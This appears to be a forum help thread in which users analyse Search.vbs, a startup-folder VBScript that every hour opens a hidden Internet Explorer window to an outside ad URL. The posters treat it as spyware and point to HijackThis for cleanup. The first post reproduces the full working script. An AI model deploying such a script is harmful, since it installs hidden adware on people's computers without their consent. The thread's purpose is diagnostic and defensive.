The culprit is a file named Search.vbs that is installed in the All Users’ start menu group (\Documents and Settings\All Users\Start Menu\Startup)
The file contents is:
while 1
wscript.sleep 3600000
set search = createobject(“internetexplorer.application”)
search.height = 0
search.menubar = 0
search.statusbar = 0
search.toolbar = 0
search.width = 0
search.navigate “http://vbs.searchwww.com/vbs.cgi”
do while search.busy
wscript.sleep 1000
loop
if search.height = 0 and search.width = 0 then
search.quit
else
search.visible = 1
end if
wend
This appears to be a browser hijack, rather than a virus and as such won’t be dected as a virus. It is difficult to suggest a solution without information.
You don’t mention what effects this has had, download ads, redirect to various adult related sites, etc. The more information you can provide the more likely we are to be able to help.
Also as from the url (vbs.search, etc.) it would appear to be a Visual Basic script? and if so is script blocking is not a feature of the free avast home version. If you require script blocking this is available in the Pro version.
Do you have any anti adware/spyware softhare installed (look at my sig below fr some), do you have the hijackthis program? if so have you run it? what were the results (paste them here or check out, Eddy’s HiJackThis Info and Analysis page, HijackThis log file analyzer and follow the directions there and get back to us if you need more help…
Its not a virus. Its spyware.
I have run the URL over at my Virtual Machine and i got the GAIN/Precision Time Advertisement installer popup along with other normal popups.
If you allready have this one, than there is probably more malware! You should post a Hijackthis log, so someone here could take a look at it.
How to do it? www.hjt.klaffke.de/en